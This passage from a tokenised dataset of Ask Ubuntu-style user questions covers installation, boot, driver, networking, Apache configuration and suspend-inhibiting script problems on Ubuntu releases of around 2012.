0-dfp2 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 3840 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 0-dfp4 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 1920 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 0-dfp3 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' option `` monitor-dfp2 '' `` 0-dfp2 '' option `` monitor-dfp4 '' `` 0-dfp4 '' option `` monitor-dfp3 '' `` 0-dfp3 '' busid `` pci:2:0:0 '' endsection section `` device '' identifier `` amdcccle-device [ 2 ] -1 '' driver `` fglrx '' option `` monitor-dfp4 '' `` 0-dfp4 '' busid `` pci:2:0:0 '' screen 1 endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 virtual 5760 1920 depth 24 endsubsection endsection section `` screen '' identifier `` amdcccle-screen [ 2 ] -1 '' device `` amdcccle-device [ 2 ] -1 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection everything works reasonably well , but animations ( window maximize/minimize/close/etc ) are very slow to the point of making the ui painful to use . what settings should i tweak to fix this ? thanks !
222168	how can i install ubuntu on a pc preinstalled with windows 8 ?	i 've bought myself a new pc which comes with a windows 8 preinstalled and i want to install a linux distribution onto it , ubuntu 12.04 lts would be just fine . i 've tried booting it from a usb ( linux pendrive ) but it seems the computer wo n't detect it . it 's a packard bell easynote te laptop . i 've also tried to install it with a virtual machine but the vm screen went black . could someone help me out , please . i do n't have the levels of linux knowledge that many of you possess so please bear with me if you can . thank you .
222169	installing header file	i have downloaded glui 2.35 from http : //glui.sourceforge.net/ to my desktop as zip file . but , what should i do in order to use glui in the code as shown below ; # include < gl/glui.h > how can i do that in ubuntu 12.04 ?
222170	sqlite encryption what package	i have an application witch uses an encrypted sqllite db with aes 128.i receive the error : file is encrypted or not a database . it is an ok database because on windows i can read it using the same tool . but here the library sqlite does not have encryption support . i tried https : //launchpad.net/ubuntu/oneiric/+package/libwxsqlite3-2.8-0 still the same message . how can i compile sqlite in order to support encryption ?
222172	gparted is stuck on `` shrink file system '' ( hfs+ )	i 'm trying to install ubuntu 12.10 on am mac book pro 8.2 as a dual boot . after disabling journaling on the mac hfs+ partition , i booted from the ubuntu mac cd and started gparted . there , i resized the hfs+ from 464 gib to 346 gib ( second and third steps would be the creation of swap and ext4 ) . after starting , it went through `` calibrate /dev/sda2 '' in no time and skipped checking the filesystem ( i had forgotten to install the hfsplus and hfstools package beforehand , that might be the reason ) . now , it has been stuck on the third step , â '' shrink file system '' , for 4.5 hours and it does n't indicate any progress at all ( the progress bar moves from left to right and then back again , and there is no time indicator ) . is this normal behavior and should i just keep going , or did it run into some error and i just do n't get any feedback ? unfortunately , i post an image yet due to my reputation .
222175	installing ubuntu12.10 and wine1.4 on offline	i have a computer with dual core cpu , ram 2gb and hdd 250gb . i have been installed windows 7 and ubuntu 12.10 on offline . the space i have allocated for ubuntu12.10 is 25gb . i have no internet . i have installed ubuntu12.10-desktop-i386.iso with the following partition structure . sda5 ext4 / 11000mb sda6 ext4 /home 11000mb sda7 swap area 3000mb i want to install windows application and games on ubuntu . so i tried to install wine1.4 typing the following command in the terminal and placed wine1.4 folder on desktop . sudo apt-get install wine1.4 but i am getting the following error . building dependency tree reading state information ... done reading package lists ... done e : unable to locate package wine1.4 e : could n't find any package by regex 'wine1.4' i do n't know what to do . can anyone please help me ?
222177	launcher does not appear	i am a complete newbie , running ubuntu 12.04 lts on an old powerpc . while i was installing the recommended updates this morning , i tried playing around with auto-hiding the launcher . it did n't show up again so , i turned the default behavior back on , with the launcher always visible . when the updates completed , i was instructed to restart the computer . i did so , and now the launcher wo n't appear at all . i 've tried some solutions i found online , but none have worked . i have a windows keyboard , but pressing the start key does nothing . my keyboard settings are the defaults . do i need to do something special to get a super key ? i tried bringing up a terminal window with ctl+alt+t and typing : unity -- reset . i get the message compiz ( opengl ) - fatal : software rendering detected . any help will be much appreciated , but please , keep it as simple as possible .
222179	upgrade to 12.10 failed , system freezes	after upgrading from 12.04 to 12.10 last night , i received several error messages . i try to send reports for the ubuntu teams , and after the upgrading finished , i realise it 's a complete failure . when i boot the computer , i get to the desktop with the icone but then i can not do much as it is all frozen . i start to freeze , nothing can be done for 3-4 minutes , then all icones and bars dissappear and reappear , it seems like it unfreezes but refreezes instantly . however i can use the terminal , so does anyone have an idea how to reinstall or fix this through the terminal or whatever ?
222182	ubuntu kernel ca n't read its own root partition , but livecds can ?	my / partition is unreadable from the hard drive install , but i just ran fsck on it and know it 's clean . i can open it in nautilus from the livecd but chrooting to it does n't work ! it [ the chrooted install ] gives me errors when i try to run dpkg or apt-get . what 's going on ? why ca n't ubuntu start if the partition is fine ? i re-installed grub using boot-repair ( sourceforge site ) and now it does n't drop me to rescue prompt , but when i start ubuntu it loads the kernel and initial ramdisk but ca n't seem to access its own disk . is there any command line wizardry i can run from the rescue prompt ? what 's going on ? more information : recovery mode results : trying to run chkdsk results in an error : mountall : disconnected from upstart trying to drop to root shell results in an error : sulogin : can not open user password database '' system config '' results are fine but it tells me under apt that `` database is consistent : no ( bad ) '' . this is worrying . the root partition is reported as having 0.05 % noncontiguous space , so there are no fragmentation problems . something possibly unrelated is in the wall of text that appears whenever you boot without quiet splash , i saw something along the lines of `` sdhci-pci 0:00:02 invalid iomem size - you may experience problems . ( i do n't know what this is , but it scares me ! ) i ran boot-repair twice ; once to get grub working and not drop me to rescue prompt and another time to try to purge and re-install grub . it wanted me to chroot to my old install and then run dpkg-reconfigure to uninstall and reinstall grub , but upon trying to run the uninstall command it told me that the command was not installed ( will post screens when i find the flash drive i saw them on ) . here 's my current bootinfo ( generated by boot-repair ) . sdc is a flash drive that i had plugged in ( and subsequently lost -_- ) , i did n't know it would be picked up by the script . this is a bootconfig summary from an hour earlier . ( i 'll post screenshots when i get my flash drive . )
222185	menu not showing in apps when maximized 12.10	i have removed the global app menu as i prefer to have the minimize , maximize , close buttons on the right side of each app . i did this with no problem in 12.04 . i did an upgrade to 12.10 and noticed that chrome , chromium and firefox all use the global menu . i have done the following : sudo apt-get autoremove appmenu-gtk appmenu-gtk3 appmenu-qt i have disabled the firefox extension . i removed the corresponding firefox package but still only have a global menu . i tried gconf but apparently that does not work in 12.10 . i then tried dconf and found this fix on google : org > gnome > desktop > wm > preferences , look for `` button_layout '' on the right panel . here is the problem , after desktop , i do not have wm . i reset unity and got a message saying something about wm is missing . i rebooted and opened chrome and still no fix . i then clicked maximize and once chrome was not maximized anymore , the minimize , maximize , close buttons show up in chrome . same with firefox ! any ideas ? i am truly stumped . firefox and chrome work fine in kde plasma and gnome when maximized .
222189	keyboard shortcuts are not working when unity plugin in ccsm is disabled ?	i am using ubuntu 11.10 with unity 2d , i dont like the unity launcher and use docky . so , i have created a new seeion and using some tweaking and playing around i have been successful to get rid of the unity launcher and make a perfect interface that i like , but there are two problems .. keyboard shortcuts not working i had to disable the ubuntu unity plugin in ccsm to get rid of the unity laucher..when it is enabled , i can use the keyboard shortcuts such as alt+tab etc .. but when i disable it , i am unable to use some shortcuts , i can still use some shortcuts like alt+f4 ect . when i maximise a window , it used to show two window ( close , maximise , minimize ) buttons and title bars so , i set the window decoration in ccsm to ! maxvert from any , and it is working fine for most of the time until i try to snsp the window to a side then the title bar just disappears , leaving space between the panel and the window , i cant close this window until i use the alt+mouse to drag it out , because no buttons would be displayed ..
222190	wired connection does n't work in quantal - toshiba c850	it has realtek wireless rtl8723ae card and atheros ar8162 fast ethernet [ 1969:1090 ] i was able to get the wireless working from wireless card realtek rtl8723ae-bt is not recognized but can not get the wired connection to work how can i solve this ? will the future releases of ubuntu support these cards ?
222192	missed environment variables in eclipse juno	i recently moved from eclipse indigo to juno . i installed the ide in my ubuntu 12.04 by downloading the archive from here . then i created an entry in the unity launcher for juno as i done before for indigo . here is what i wrote in ~/.local/share/applications/eclipse-juno.desktop : [ desktop entry ] type=application name=eclipse juno comment=eclipse integrated developmentm environment icon=~/.eclipse-juno/icon.xpm exec=~/.eclipse-juno/eclipse -vmargs -duser.name= '' my name '' terminal=false categories=development ; ide ; java ; when i run eclipse from the unity launcher , eclipse does not see environment variables that i set in ~/.bascrc . instead , if i run eclipse from shell , it can see all the env variables . how can i fix the problem ? thanks a lot .
222193	cloning a dual boot system from hdd to ssd	i 'm planning on replacing my laptop 's hdd with a 256gb ssd , but i have a dual-boot ( 12.04 and windows 7 ) setup and i 'd like to be able to directly migrate ubuntu over without having to reinstall and lose all of my settings . gparted reports the following partition setup on my hdd . i am , of course , able to modify it if necessary . /dev/sda1 ( ntfs ) 66.92 out of 200.00 mb used i 'm honestly not sure what this partition is for . maybe for windows 7 system files ? i 'm hesitant to mess with it . ( edit ; it turns out it is a partition for windows recovery files in the event of os corruption , so i do n't want to remove it . plus it also appears to be a major pain to remove anyways ) /dev/sda2 ( ntfs ) 116.35 out of 339.06 gb used ( boot ) this partition is the c : / drive on my windows installation . i do n't use it on my ubuntu installation , except it is the boot partition and thus has grub on it . /dev/sda4 ( extended ) > /dev/sda5 ( ext4 ) 14.49 out of 91.34 gb used > /dev/sda6 ( linux-swap ) 5.92 gb these are my ubuntu partitions . /sda5 contains my documents and all of the files i use on ubuntu , and ( as far as i know ) the system files for ubuntu itself ( it 's the partition i created when prompted by the live-dvd installer ) . /sda6 is , of course , the swap partition which i only need for hibernation ( 6gb of ram ) . /dev/sda3 ( ntfs ) 9.89 out of 14.75 gb used this is an annoying partition that lenovo created to store some drivers and files that i might need later on . for example , it allows me to use onekeyrecovery for a quick factory recovery if absolutely necessary , not sure if that 'll work on an ssd . it also contains not-so-important files for bloatware installation . in total , my hdd only has about 150gb of files on it so it should fit comfortably on the ssd . the problem is , i want to exactly migrate my files , partitions , oses , mbr , etc . from my hdd to my ssd and i 'm not quite sure how to do this . i 've seen clonezilla referenced before , but i 'm not all too experienced and the documentation for it quite frankly seems a bit like a foreign language to me . so , put simply , is there any way i can exactly clone this hdd to an ssd without a massive headache ? also , if it matters , i 'll probably be using an external hard drive case ( as recommended in online tutorials ) to externally attach the ssd to my laptop during the cloning process due to the lack of two hard drive slots in the machine .
222194	how to get a version of libreoffice without unity integration ?	libreoffice in the latest version of ubuntu ( 12.10 ) is pretty bugged , with several open bugs on things like menus and windows . how to get a version , even ugly but working , of libreoffice without any unity integration ?
222197	setting primary internet connection and network on notebook	i have installed ubuntu on a notebook that i have configured to connect to the internet using an iburst usb modem . this works 100 % after a bit of configuring . i now have a desktop pc that i have installed ubuntu on , and would like to connect the two with a router . i bought a router with wifi , and would like to connect my notebook to the other computer using wifi , while still keeping the internet working with the usb modem . the problem is that as soon as the wifi connects , the internet connection dies . is there a way to force ubuntu to get internet access through the usb modem , but use wifi to connect to the network ? i am pretty new to ubuntu so any help would be appreciated . i also have a samsung galaxy tab that i would like to connect to the internet through usb modem via the wifi , so is there also a way to share that internet connection with the other computers on the network ?
222198	make install - how to use wget , not curl	i do not have root access on my ubuntu but want to install git . i was following this tutorial but when running make or make install it says curl is not installed . can i use wget instead if this is a make config setting ?
222199	can empathy be configured to stay updated will a full conversation ?	the google talk web app and android app will always update themselves with all messages sent from all clients and i was wondering if empathy can be configured to do this . for example , if i start a conversation on my phone and then change to my pc an use the web app , all the messages i sent will show up in the im window on the pc even though i sent them when i was on my phone . empathy does not behave this way . it only shows the ims that occurred when using empathy . if empathy can not do this , is there any other client that can do it ?
222200	how to use freedict dictionaries ?	i have installed some dictionaries . what is the application to use ? gnome dictionary and artha are also installed but both just give english definitions to english words .
222201	is there a way to edit the places menu in ubuntu 12.10 gnome fallback ?	there is applications and places menus in the gnome fallback ubuntu 12.10 , what i found that i only can edit the applications menu , and there is no way to edit the places menu , in gnome 2 there is a way to edit the bookmarks in nautilus and they are changed in the places menu , its not the same in gnome 3 fallback when i add bookmarks folders it dont appear in places menu . is there a way to add shortcuts to folders in places menu ? ?
222204	hiding images in folder without renaming or moving the files	i 'm dual booting ubuntu with windows and i have all my music on a separate harddrive . in windows the album art is hidden by default but when i access the folder in ubuntu there is two album artwork files for every mp3 , one small and one large . i would like to hide those images without having to rename them with a dot before or moving them to some other folder becuase then the album artwork would dissapear in windows . is there a way to make a .hidden file which hides all images or any other way which hides all images in nautilus ?
222208	use webcam in 12.10 from hyper-v	i just installed 12.10 on windows 8 hyper-v because i have a task which needs windows and ubuntu simultaneously ( even though i have ubuntu dual-booted ) . i need to use the webcam from hyper-v and am unable to make ubuntu recognise it . cheese just shows a black screen . this is an urgent matter . please help .
222210	error : not file found grub rescue after installing ubuntu 12.10	i installed 12.10 and when it finished i restarted it , but it says at the beginning : error : file not found , grub rescue > i then tried boot-repair and : sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update the internet is connected , but it says : can not access ppa ( https : //launchpad.net/api/1.0/~yannubuntu/+archive/boot-repair ) to get ppa information , please check your internet connection . is there any other way to fix this please ?
222212	ca n't get ubuntu on new laptop !	i just got a new laptop : the asus vivobook x2o2e , and for some reason , ubuntu 's ( 12.10 ) not working . whenever i install it , i choose `` reboot now '' , and then it shows an error : can not load windows and unknown program ; missing a required file . after four tries , i gave up . however , my technological life requires ubuntu , so i seek your help . thanks , rsinghal
222213	quickly access auto-hide option	when i use teamviewer to access my laptop , i want the launcher to stay put ( ie not autohide ) . but when i am at home i want the launcher to autohide . is it possible to map the auto-hide option to a hotkey , put it on the desktop or put it in the context-menu ( when you right click ) of the desktop ?
222215	howto run ubuntuone headless	following https : //wiki.ubuntu.com/ubuntuone/headless i run into a snag at : u1sdtool -- start it gives : x11 connection rejected because of wrong authentication ( why x11 ? ? this was supposed to be headless . the used u1sdtool is actually the wrapper in ~/bin/ )
222217	add new dictionaries to gnome dictionary ?	how to add sources to this dictionary seems simple enough but what is to be written there ? it is only in english and i would like to have other dictionaries - see my related question
222218	problem with the amd drivers in ubuntu 12.04 lts	after installing the driver for the video card ati radeon hd 3870 , i can not run ubuntu ( just a purple screen and all ) . tried to go to recovery mode as root and write `` apt-get purge fglrx* '' , but nothing happened . then i decided to go into failsafe mode , but nothing ( writes `` clean some blocks '' and all ) . -ubuntu 12.04 lts ( kernel 3.3.6 ) -ati radeon hd 3870 p.s . sorry if i write with mistakes . i am russian , and understand very little english , so i used google
222223	how to remove environment variables set for qstk ?	i am new to ubuntu , and i 'm having trouble with the terminal application . every time i open it this message appears : '' bash : /home/xxxxx/.bashrc : line 1 : syntax error near unexpected token ` ( ' bash : /home/xxxxx/.bashrc : line 1 : `source qstk/local.sh # ~/.bashrc : executed by bash ( 1 ) for non-login shells . ' '' how can i remove or delete it ?
222231	how can i install install linksys wusb54gs v2 to work in ubuntu ?	i have install ubuntu 11.04 and i tried to just plug in my adapter and see if it would work . it does n't so i went to the ubuntu forums . it said i had to install ndiswrapper but i have to have internet which i do not have ! i ca n't move the computer at all and it is driving me crazy . if anyone can help me that would be awesome . thanks .
222232	hp dv2700 series , wifi not working in ubuntu 12.10 , wifi button always disabled	i have a hp dv2745se laptop . i always had ubuntu with the native windows vista and wifi worked fine . suddenly my ubuntu would n't load anymore , i tried fixing it for a week and eventually i formatted its partition and just installed ubuntu 12.10 this laptop has a wifi switch that works fine in vista disabling / enabling the wireless connection . hp wireless assistant in windows say wireless is on . however , whenever i log in ubuntu the wifi button is always orange ( disabled ) and wireless never works . i had this problem once when i had ubuntu 12.04 and i fixed it by verifying in windows that the wireless assistant showed the wireless lan in `` on '' mode . however , the same does not work now . i 've seen some possible solutions that involve updating the firmware with apt-get . there comes my 2nd problem , my network adapter card is not working and thus i have no internet at all . any suggestions ? thanks !
222235	boot problem in ubuntu 12.04 using wubi	am totally new on ubuntu . i have installed ubuntu 12.04 with the help of wubi installer on my desktop . i have windowsxp alreddy on my desktop . ubuntu install correctly but when desktop restart to open the ubuntu for first use i used . but after restarting for the second use the screen got freezed in password screen i was not able control mouse neither keyboard . please tell me what should i do with is problem .
222240	using shortkeys to search the internet for a term selected in a text editor/viewer	it seems possible ( as i learned from a comment to this question made by user55822 ) to use a command in order to search a term on the web by using `` keybinding '' the way aretha is used . what the aforementioned user says is that '' you could search mouse selection anywhere by using an app like artha , or by keybinding sh -c 'firefox `` http : //translate.google.com/ # en/fr/ $ ( xclip -o ) '' ' ( example given translate english into french ) '' a lot of things are obscure for me here . i could use artha or keybinding ( as alternative ) , or both ? how to do that in each case ? and '' the command i gave you will open google translate in firefox with your mouse selection ( text highlighted ) as a query . use sh -c 'firefox `` https : //www.google.com/search ? q= $ ( xclip -o ) '' ' if you want regular google over google translate . and obviously , that would work everywhere '' i do not know what to do with that formula . what should i do exactly ? how to use it ? in what application ?
222242	i can send email but , i ca n't receive mail	i can send email , but i ca n't receive email . no error messages . just nothing in the `` in box '' . can anybody helpme fix this problem ?
222243	install previous package version	i recently updated to firefox 17 during a system upgrade . $ sudo apt-get update & & sudo apt-get upgrade . how do i revert back to a previous package version ? i 'd like to get back to firefox 16.0.2 .
222245	installation of ubuntu 12.10 not sucessful in samsung np100 notebook	after installation of ubuntu 12.10 from usb made using the startup disk creator , on new samsung np-n100s-e01in notebook it does not boot . on booting the system just runs an update and stops with message stopping kernel ... even recovery mode is not working .
222247	need assist - converting windows media server to ubuntu	i found this guide but have a few questions : http : //dagolav.prestegarden.com/installing-ubuntu-on-the-hp-mediasmart-ex490/ i 'm not a linux guru yet , fairly new . i want to convert this sweet little network storage server device ( hp windows media server ) into an ubuntu storage server . my questions are as follows : 1 ) the guide mentions the sis191 network card on this board is not supported by the ubuntu 10.04 sis191 drivers . is this still the case with more recent ubuntu builds ? since an older chipset , i 'm guessing probably still not supported . not sure how to research this to get an answer myself ( still too new to linux ) . 2 ) the chassi of this box supports 5 hard disk drive bays . i 'm going to attempt this as headless install ( as guide suggests using another pc machine to boot , format and install ubuntu , then move drives into device and try remoting in ) . to add additional hard drives into the chassis , will ubuntu server auto-detect these on bootup after i add the hard disks physically into the bays ? i was n't planning to set any advanced raid up . i 'll research the onboard raid controller , the windows media server software did auto-recognize all hard drives and by default just showed a virtualized storage space - but i do n't believe it was doing any raid fault tolerance on the drive and the storage was just a virtual pool managed by the software . it was long ago i set it up and i think at one point there was a config option in the software , but i did n't do any mirroring or striping . i 'm sure as i go though this i 'm likely to have more questions - part of this exercise is to go through a full server build to get more experience with linux management . thanks in advance , apologies if these are overly 'noob ' questions - c
222248	where 's syslinux.cfg in lubuntu 12.04 ?	can someone tell me where the 'syslinux.cfg ' file is located in lubuntu 12.04 ?
222253	how do i add a d-bus command as a global shortcut in gnome ( classic ) ?	how do i add a d-bus command as a global shortcut in gnome ( classic ) ? i can do it in kde , it gives an option to add a new shortcut as a d-bus command . i do not want to write a script just for this .
222255	how to figure out command to launch a program from terminal	i want to figure out how to open a program after i install it in terminal . i do it with programs all the time , but i do n't know how to find out after i install a program what command to run , what file path the everything is in or any thing like that . the program i am trying to figure out how to open from terminal right now is netbeans ide 7.2.1 , but i do n't just want to understand how to open it , i want to understand how to find out where to go after i install it , whether i have installed it with apt-get or if i used dpkg ?
222259	can i customize the colors in my r terminal environment ?	i 'm running r version 2.13.1 and wondering if there is a way to get more interesting colors in the r terminal , either in bash or tk-r
222260	why grub is missing after update ?	i am running an alternate install of ubuntu 11.10 . i just ran the latest update which required a re-boot . when i rebooted , my desktop stops at the post ( power on self test ) . my computer is set up with logical volumes ( which is why i used the alternated install ) . i can not get to the boot ( grub ) prompt . i can load the ubuntu live cd and see my first drive ( 40 gb ) but can not access my logical volumes . i am still somewhat new to linuc and need help . how can i get this desktop to working again without losing my very valuable ( and not backed up ) information ? thanks !
222261	dual stack apache	i have an ubuntu 12.04 server with a number of ipv4 addresses and a /64 of ipv6 addresses . i have it responding to its ipv6 addresses with ping6 . i 'd like the domains hosted on the server to go dual-stack , so ipv6-enabled visitors will be able to access its sites over ipv6 , and everyone else will use ipv4 . here 's the relevant parts of my apache config as it stands now : ports.conf : namevirtualhost 199.192.201.82:80 listen 199.192.201.82:80 listen [ 2607 : ff50:0:21 : :2 ] :80 httpd.conf : < virtualhost 199.192.201.82:80 > servername cdc.nexussl.net directoryindex index.php documentroot /var/www loglevel warn errorlog /var/www/error.log customlog /var/www/access.log combined < /virtualhost > < virtualhost 199.192.201.82:80 > servername ipv6.nexussl.net directoryindex index.php documentroot /var/www loglevel warn errorlog /var/www/error.log customlog /var/www/access.log combined < /virtualhost > < virtualhost 199.192.201.82:80 > servername dual.nexussl.net directoryindex index.php documentroot /var/www loglevel warn errorlog /var/www/error.log customlog /var/www/access.log combined < /virtualhost > cdc.nexussl.net has an a record pointing to 199.192.201.82 , ipv6.nexussl.net has a aaaa record pointing to 2607 : ff50:0:21 : :2 , and dual.nexussl.net has both an a and a aaaa record . with that setup , ipv4 works fine ( they should all display a `` you look lost '' page ) , but visiting ipv6.nexussl.net or dual.nexussl.net from an ipv6-capable machine returns not found the requested url / was not found on this server . apache/2.2.22 ( ubuntu ) server at ipv6.nexussl.net port 80 dual.nexussl.net works correctly on an ipv4-only connection . ultimately , i 'd like all sites to be set up in dns like dual.nexussl.net , with both a and aaaa records . in apache 's config , i ca n't just use listen 80 , because other applications on that server use port 80 on other ips . apache should only use 199.192.201.82 as far as ipv4 goes . as far as ipv6 , should i give each site its own ipv6 address , and they 'll just share one ipv4 ? i feel like that could get messy listing an ipv6 address in ports.conf for every site . even if i 'm having them all share an ipv6 address , how do i get apache to serve sites correctly over ipv6 ?
222265	personal cloud server	ok , so what i 'm wanting to do is turn my old computer into an ubuntu based cloud server that i can access from outside my home wifi network . for example , i 'd like to be able to access all the information on my server from my smartphone while i 'm at school or at work . could someone please explain to me how to do this ?
222267	how to keep a shared folder after reboot ?	how to keep a shared folder after reboot ? i have a samba share to file share over a home network and every reboot the share reverts back to non shared state . the permissions are staying the same , but the folder is invisible to windows users and android users on the network . dhcp is enabled however the host ubuntu ultimate 3.2 box has a static ip address . on the host desktop the folder is marked to share until a reboot . any ideas ? ? ?
222269	how can i find lost document created using lubuntu guest account ?	a friend used my old laptop to write an .rtf document . lacking the administrator password , he used a guest account . now i 'm trying to get the document for him . it seems that using a guest account requires a password i do n't know . searching the hd while logged in to my account is turning anything up . perhaps docs created from another account are hidden from me , or perhaps i 'm not searching right ( using catfish because i am a novice user ) ?
222270	terminal not working does not open at all	hi everybody i dont know if this topic has been already adressed . since i have installed the ubuntu 12.10 terminal is not opening , i tried uninstalling it and installing it again but it does not help . any comments ? tips ?
222276	appear to have cinnamon backgrounds in ubuntu 12.04	i have ubuntu 12.04 installed . as a newbie , i followed instructions to load the cinnamon and gnome desktops for comparison purposes . after comparing , i decided i prefer the default ubuntu desktop . my problem is , when i want to change my wallpaper now , i always get the cinnamon dialog box , not ubuntu 's . i have verified that i am choosing ubuntu @ login , but i no ubuntu options . should i just un-install cinnamon & gnome ?
222277	how to find the program name of an x window ?	i was just reading âťhow to revert to gnome classic ? âť . some answers say that you should press alt+win to get the add to panel dialogue . however my keyboard has no win . so i was asking myself how to start the add to panel window . usually the best way is to enter the program name into a terminal . in this case i ca n't figure out the name . i tested it on another computer and could n't find the name in the process list . also xwininfo or similar programs shoed no name . so what is the best way to figure out the name of the program which opened a ( x ) window .
222282	12.10 does n't recognize integrated graphics card of intel g540	i could n't find an answer to this question . does anyone know how to make ubuntu recognize the intel g540 integrated graphics card ?
222284	why is extras.ubuntu.com down ?	i 've been trying to update for several days now , and it tells me that extras.ubuntu.com is unavailable . why is it unavailable ?
222289	how to inhibit suspend temporarily ?	i have searched around a bit for this and ca n't seem to find anything helpful . i have my pc running ubuntu 12.10 set up to suspend after 30 minutes of inactivity . i do n't want to change that , it works great most of the time . what i do want to do is disable the automatic suspend if a particular application is running . how can i do this ? the closest thing i 've found so far is to add a shell script in /usr/lib/pm-utils/sleep.d which checks if the application is running and returns 1 to indicate that suspend should be prevented . but it looks like the system then gives up on suspending automatically , instead of trying again after another 30 minutes . ( as far as i can tell , if i move the mouse , that restarts the timer again . ) it 's quite likely the application will finish after a couple of hours , and i 'd rather my pc then suspended automatically if i 'm not using it at that point . ( so i do n't want to add a call to pm-suspend when the application finishes . ) is this possible ? edit : as i noted in one of the comments below , what i actually wanted was to inhibit suspend when my pc was serving files over nfs ; i just wanted to focus on the `` suspend '' part of the question because i already had an idea how to solve the nfs part . using the 'xdotool ' idea given in one of the answers , i have come up with the following script which i run from cron every few minutes . it 's not ideal because it stops the screensaver kicking in as well , but it does work . i need to have a look at why 'caffeine ' does n't correctly re-enable suspend later on , then i could probably do better . anyway , this does seem to work , so i 'm including it here in case anyone else is interested . # ! /bin/bash # if the output of this function changes between two successive runs of this # script , we inhibit auto-suspend . function check_activity ( ) { /usr/sbin/nfsstat -- server -- list } # prevent the automatic suspend from kicking in . function inhibit_suspend ( ) { # slightly jiggle the mouse pointer about ; we do a small step and # reverse step to try to stop this being annoying to anyone using the # pc . todo : this is n't ideal , apart from being a bit hacky it stops # the screensaver kicking in as well , when all we want is to stop # the pc suspending . can 'caffeine ' help ? export display=:0.0 xdotool mousemove_relative -- sync -- 1 1 xdotool mousemove_relative -- sync -- -1 -1 } log= '' $ home/log/nfs-suspend-blocker.log '' activityfile1= '' $ home/tmp/nfs-suspend-blocker.current '' activityfile2= '' $ home/tmp/nfs-suspend-blocker.previous '' echo `` started run at $ ( date ) '' > > `` $ log '' if [ ! -f `` $ activityfile1 '' ] ; then check_activity > `` $ activityfile1 '' exit 0 ; fi /bin/mv `` $ activityfile1 '' `` $ activityfile2 '' check_activity > `` $ activityfile1 '' if cmp -- quiet `` $ activityfile1 '' `` $ activityfile2 '' ; then echo `` no activity detected since last run '' > > `` $ log '' else echo `` activity detected since last run ; inhibiting suspend '' > > `` $ log '' inhibit_suspend fi edit 2 : the script above works but thanks to another comment below , i am now using this pair of scripts , which have the advantage of allowing the screensaver to kick in while i am inhibiting suspend . the first is /usr/lib/pm-utils/sleep.d/000nfs-inhibit , which will prevent a suspend attempt if an inhibit file exists : # ! /bin/sh log= '' /home/zorn/log/nfs-suspend-blocker.log '' inhibitfile= '' /home/zorn/tmp/nfs-suspend-blocker.inhibit '' echo `` $ 0 : started run at $ ( date ) , arguments : $ * '' > > `` $ log '' if [ `` $ 1 '' = `` suspend '' ] & & [ -f `` $ inhibitfile '' ] ; then echo `` $ 0 : inhibiting suspend '' > > `` $ log '' exit 1 fi exit 0 the second is a modified version of the previous nfs-suspend-blocker script and should still be run from cron . it now follows the strategy outlined in the comment below : # ! /bin/bash # this works in tandem with /usr/lib/pm-utils/sleep.d/000nfs-inhibit , which # will prevent a suspend occurring if $ inhibitfile is present . once it prevents # a suspend , it appears that it requires some `` user activity '' to restart the # timer which will cause a subsequent suspend attempt , so in addition to # creating or removing $ inhibitfile this script also jiggles the mouse after # removing the file to restart the timer . # if the output of this function changes between two successive runs of this # script , we inhibit auto-suspend . function check_activity ( ) { /usr/sbin/nfsstat -- server -- list } # slightly jiggle the mouse pointer about ; we do a small step and reverse step # to try to stop this being annoying to anyone using the pc . function jiggle_mouse ( ) { export display=:0.0 xdotool mousemove_relative -- sync -- 1 1 xdotool mousemove_relative -- sync -- -1 -1 } log= '' $ home/log/nfs-suspend-blocker.log '' activityfile1= '' $ home/tmp/nfs-suspend-blocker.current '' activityfile2= '' $ home/tmp/nfs-suspend-blocker.previous '' inhibitfile= '' $ home/tmp/nfs-suspend-blocker.inhibit '' echo `` $ 0 : started run at $ ( date ) '' > > `` $ log '' if [ ! -f `` $ activityfile1 '' ] ; then check_activity > `` $ activityfile1 '' exit 0 ; fi /bin/mv `` $ activityfile1 '' `` $ activityfile2 '' check_activity > `` $ activityfile1 '' if cmp -- quiet `` $ activityfile1 '' `` $ activityfile2 '' ; then echo `` $ 0 : no activity detected since last run '' > > `` $ log '' if [ -f `` $ inhibitfile '' ] ; then echo `` $ 0 : removing suspend inhibit file and jiggling mouse '' > > `` $ log '' /bin/rm `` $ inhibitfile '' jiggle_mouse fi else echo `` $ 0 : activity detected since last run ; inhibiting suspend '' > > `` $ log '' touch `` $ inhibitfile '' fi
222293	fuzzy audio when skype makes sound	i am having trouble getting my sound to work properly in skype . every time skype makes noise , all of my audio goes crackly , including anything else that 's coming from other programs , even when the skype volume is muted . i am quite sure it 's something dodgy with the sound card , which is a soundblaster live ! platinum , kinda old thing but was good in it 's day . this is a sample of receiving a message . broken sound i just tried to record music with skype messing the audio , but it is now working fine . this happens sometimes , it 's not permanently fixed . fixed sound now sound like this ( same sound as other clip ) fixed sound skype input/output are all set to 'pulseaudio server ( local ) ' and ca n't be changed to alsa . using alsa fixed the same problem using teamspeak which pretty much concludes there 's something going wrong with pulseaudio , i do n't know much about how sound works so i ca n't say more than that .
